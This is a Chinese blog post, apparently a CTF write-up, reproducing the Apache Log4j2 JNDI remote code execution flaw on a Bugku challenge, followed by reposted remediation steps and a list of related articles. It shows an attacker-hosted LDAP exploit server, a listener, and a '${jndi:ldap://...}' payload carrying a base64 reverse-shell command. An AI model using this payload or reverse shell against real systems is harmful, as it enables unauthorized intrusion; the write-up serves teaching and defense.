Apache_Log4j2_RCE漏洞复现

已于 2022-06-23 10:29:06 修改
阅读量4.2k 收藏 2
点赞数
分类专栏: CTF 文章标签: 安全
于 2022-04-24 14:31:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53095382/article/details/124382020
版权

漏洞描述:

          Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。


影响范围:

Apache Log4j 2.x < 2.15.0-rc2

利用bugku中的题来复现该漏洞

 在公网搭建自己的LDAP服务

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i x.x.x.x

同时开启监听(新建终端)监听55555端口

在输入框输入 密码随便输

${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/base64加密后命令} 

base64加密后的命令:x.x.x.x:服务器开启的端口 -e bin/sh

提交以后查看服务器

flag{75721985087c8786c71df4607cf28d32}

修复方法转载
原文链接:https://blog.csdn.net/zhangmingcai/article/details/122407246

Apache_Log4j2_RCE漏洞修复方案

一、升级官方版本(推荐)

      目前Apache官方已发布最新版升级包,JAVA7版本升级至log4j 2.12.4版本,JAVA8及以上版本升级至log4j 2.17.0版本,升级包中移除了对lookup功能的支持,默认禁用了JNDI方法,该方法目前已经通过我行测试确认可修复。

二、移除log4j包中JndiLookup类(可能存在未知影响)

       移除log4j-core包中JndiLookup类文件,并重启服务,具体方法如下:

Linux系统:

zip -q -d log4j-core-*.jar   org/apache/logging/log4j/core/lookup/JndiLookup.class

Windows系统:

jar包解压缩,删除org/apache/logging/log4j/core/lookup/路径下 JndiLookup.class文件

三、修改Log4j配置(需评估是否影响业务)

        通过更改log4j配置达到缓解作用,具体更改配置如下:

(一)jvm启动参数添加:

-Dlog4j2.formatMsgNoLookups=True

(二)在应用classpath下添加

log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

需注意该方法的两项措施在log4j 2.10.0以下版本无效,可采取第二种修复方式。

Ch33syNai1a0
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 792
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
log4j apache史诗级高危漏洞修复
par@ish的博客
12-27 1680
linux主机查看是否存在log4j组件**:find / -name "*log4j-*.jar"
内网环境模拟log4j2-rce-2021-44228+tomcat-pass-getshell+solr-stream.url-ssrf
qq_51780583的博客
04-10 844
本文主要介绍了log4j2-RCE、tomcat弱口令+war包部署、solr任意文件读取,几个漏洞的相关复现,以及内网环境下该如何去突破
分析Apache Log4j2 远程代码执行漏洞
ordersyhack
02-04 9037
分析Apache Log4j2 远程代码执行漏洞
CVE-2021-44228-Apache-Log4j-Rce漏洞反弹win&linux
渗透测试研究中心
12-14 507
0x00 漏洞描述Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。Log4j-2中存在JND...
探索Apache Log4j RCE POC:一款强大的安全检测工具
最新发布
gitblog_00066的博客
04-21 438
探索Apache Log4j RCE POC:一款强大的安全检测工具 项目地址:https://gitcode.com/xiajun325/apache-log4j-rce-poc 在网络安全领域,漏洞检测和预防是至关重要的。这个项目——apache-log4j-rce-poc,是一个针对著名Apache Log4j 2.x框架的远程代码执行(RCE漏洞的验证工具。它的目标是帮助开发者、系统管...
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j ...
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
Apache Log4j2 RCE.md
07-09
Apache Log4j2 RCE
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
bugku web-Apache Log4j2 RCE
weixin_46578840的博客
01-29 2964
一,准备环境 有VPS即可 二,题解 1,根据提示,/bin/bash:x,带x的是无法执行的(包括base64编码),打勾的是可以执行的 2,注意 首先VPS上要装有java环境和工具,这里我用的是JNDIExploit-1.2-SNAPSHOT.jar 2.2 vps先允许反弹shell用到的端口2.3,再启动工具 2.4,再开一个窗口监听nc 2.5,构造payload,根据提示进行利用 将地址改为自己的vps地址,然后将加密后的命令放到末尾 原:${jndi:ldap://x.x.x.x:1389
log4j2 rce (CVE-2021-44228)
weixin_40151476的博客
03-01 833
Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
Apache Log4j2 lookup JNDI 注入漏洞复现及利用
Tauil的博客
07-21 1147
这时候有过有过js经验的朋友都会知道嗷,编写网站的时候一般都会使用到JNDI这个接口进行目录服务查询,而JNDI中有LDAP的类,他可以用来执行我们的恶意语句,为了方便恶意语句的回显,我们到。查看网络,重新载入一下,看看每个数据包,诶这个时候就会发现有一个数据包存在参数上传,并且URL是在另一个地址。,为什么不用那个,因为啊那个是上传系统参数的数据包,有很大的区别,感兴趣可以自己去搜一下,因为本人java也不是很精通,所以就不多嘴了。并访问,这时我们的攻击机终端就会收到新的消息,这就代表命令。.......
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7548
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
linux 安装log4j,Log4j 安装
weixin_29947319的博客
05-15 1450
Log4j教程 - Log4j安装Log4j API包是根据Apache软件许可证分发的。最新的log4j版本,包括全源代码,类文件和文档可以在http://logging.apache.org/log4j/找到。我们可以从上面的链接下载apache-log4j-x.x.x.tar.gz或zip文件。支持库我们可以使用log4j将信息记录到各种目的地,例如发送电子邮件,数据库或文件。有一个我们需...
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2505
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Log4j2 RCE漏洞复现
守拙的博客
12-10 4467
最新log4j rce漏洞复现
log4j2远程代码执行RCE漏洞复现(CVE-2021-44228)
m0_57379855的博客
03-06 572
RCE远程代码执行漏洞复现log4jLog4jLDAPJNDIJNDI注入漏洞流程Log4j影响范围和排查方法修复漏洞 Log4j Log for Java,Apach的开源日志记录组件,使用非常广泛 使用方法: 1.pom引入依赖 2.获得logger实例 3.logger.info() debug() error() warn() LDAP lightweight directory access protocol轻量级目录访问协议(目录服务)默认端口389 可以批量登录 JNDI LDAP目录服务,R
bugku apache log4j2 rce
03-16
bugku apache log4j2 rce是指一个漏洞,可以通过Apache Log4j2库中的一个特定功能,实现远程代码执行(RCE)攻击。该漏洞可能会导致攻击者获取系统权限,进而对受害者进行攻击和控制。建议用户及时升级相关软件版本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ch33syNai1a0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值